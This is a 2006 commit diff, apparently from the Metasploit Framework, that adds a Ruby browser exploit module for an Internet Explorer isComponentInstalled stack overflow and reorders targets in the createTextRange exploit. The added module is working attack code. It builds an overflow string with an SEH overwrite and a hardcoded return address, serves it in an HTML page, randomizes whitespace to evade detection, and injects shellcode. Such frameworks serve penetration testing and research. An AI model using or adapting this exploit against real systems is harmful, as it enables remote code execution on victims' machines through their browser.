Addition of the isComponentInstalled() exploit and updates to the createTextRange() module

git-svn-id: file:///home/svn/framework3/trunk@4218 4d416f70-5f16-0410-b530-b9f4589650da
2006-12-17 08:03:43 +00:00 · 2006-12-17 08:03:43 +00:00 · b2fbf8eb54
parent 079ff2d4bf
commit b2fbf8eb54
2 changed files with 107 additions and 1 deletions
--- a/modules/exploits/windows/browser/ie_iscomponentinstalled.rb
+++ b/modules/exploits/windows/browser/ie_iscomponentinstalled.rb
@ -0,0 +1,105 @@
+require 'msf/core'
+
+module Msf
+
+class Exploits::Windows::Browser::IE_IsComponentInstalled < Msf::Exploit::Remote
+
+	include Exploit::Seh
+	include Exploit::Remote::HttpServer::HTML
+
+	def initialize(info = {})
+		super(update_info(info,
+			'Name'           => 'Internet Explorer isComponentInstalled Overflow',
+			'Description'    => %q{
+				This module exploits a stack overflow in Internet Explorer. This bug was
+				patched in Windows 2000 SP4 and Windows XP SP1 according to MSRC.
+			},
+			'License'        => MSF_LICENSE,
+			'Author'         => 
+				[ 
+					'hdm', 
+				],
+			'Version'        => '$Revision: 3783 $',
+			'References'     => 
+				[
+					[ 'BID', '16870' ],
+				],
+			'Payload'        =>
+				{
+					'Space'          => 512,
+					'BadChars'       => "\x00\x5c\x0a\x0d\x22",
+					'StackAdjustment' => -3500,
+				},
+			'Platform'       => 'win',
+			'Targets'        =>
+				[
+					['Windows XP SP0 with Internet Explorer 6.0', { 'Ret' =>  0x71ab8e4a } ]
+				],
+			'DefaultTarget'  => 0,
+			'DisclosureDate' => 'Feb 24 2006'))
+	end
+
+	def autofilter
+		false
+	end
+	
+	def on_request_uri(cli, request)
+
+		# Re-generate the payload
+		return if ((p = regenerate_payload(cli)) == nil)
+
+		# Create the overflow string	
+		pattern = Rex::Text.rand_text_alpha(8192)
+
+		# Smash the return address with a bogus pointer
+		pattern[744, 4] = [0xffffffff].pack('V')
+		
+		# Handle the exception :-)
+		seh = generate_seh_payload(target.ret)
+		pattern[6439, seh.length] = seh
+		
+
+		# Build out the HTML response page
+		var_client = Rex::Text.rand_text_alpha(rand(30)+2)
+		var_html   = Rex::Text.rand_text_alpha(rand(30)+2)
+		
+		content = %Q|
+<html >
+<head >
+	<script >
+		function window.onload() {
+			#{var_client}.style.behavior = "url(#default#clientCaps)" ;
+			#{var_client}.isComponentInstalled( "__pattern__" ,  "componentid" ) ;
+		}
+	</script >
+</head >
+<body id = "#{var_client}" > #{var_html}
+</body >
+</html >
+		|
+
+		# Randomize the whitespace in the document
+		content.gsub!(/\s+/) do |s|
+			len = rand(100)+2
+			set = "\x09\x20\x0d\x0a"
+			buf = ''
+			
+			while (buf.length < len)
+				buf << set[rand(set.length)].chr
+			end
+			
+			buf
+		end
+		
+		# Insert the shellcode		
+		content.gsub!('__pattern__', pattern)
+		
+		print_status("Sending exploit to #{cli.peerhost}:#{cli.peerport}...")
+
+		# Transmit the response to the client
+		send_response_html(cli, content)
+	end
+
+end
+
+end
--- a/modules/exploits/windows/browser/ms06_013_createtextrange.rb
+++ b/modules/exploits/windows/browser/ms06_013_createtextrange.rb
@ -48,8 +48,9 @@ class Exploits::Windows::Browser::MS06_013_CreateTextRange < Msf::Exploit::Remot
 			'Platform'       => 'win',
 			'Targets'        =>
 				[
-					[ 'Internet Explorer 7 - (7.0.5229.0 - Windows XP SP2)', { 'Ret' => 0x3C0474C2 } ],
 					[ 'Internet Explorer 6 - (6.0.3790.0 - Windows XP SP2)', { 'Ret' => 0x746F9468 } ],
+					[ 'Internet Explorer 7 - (7.0.5229.0 - Windows XP SP2)', { 'Ret' => 0x3C0474C2 } ],
+					
 				],
 			'DefaultTarget'  => 0,
 			'DisclosureDate' => 'Mar 19 2006'))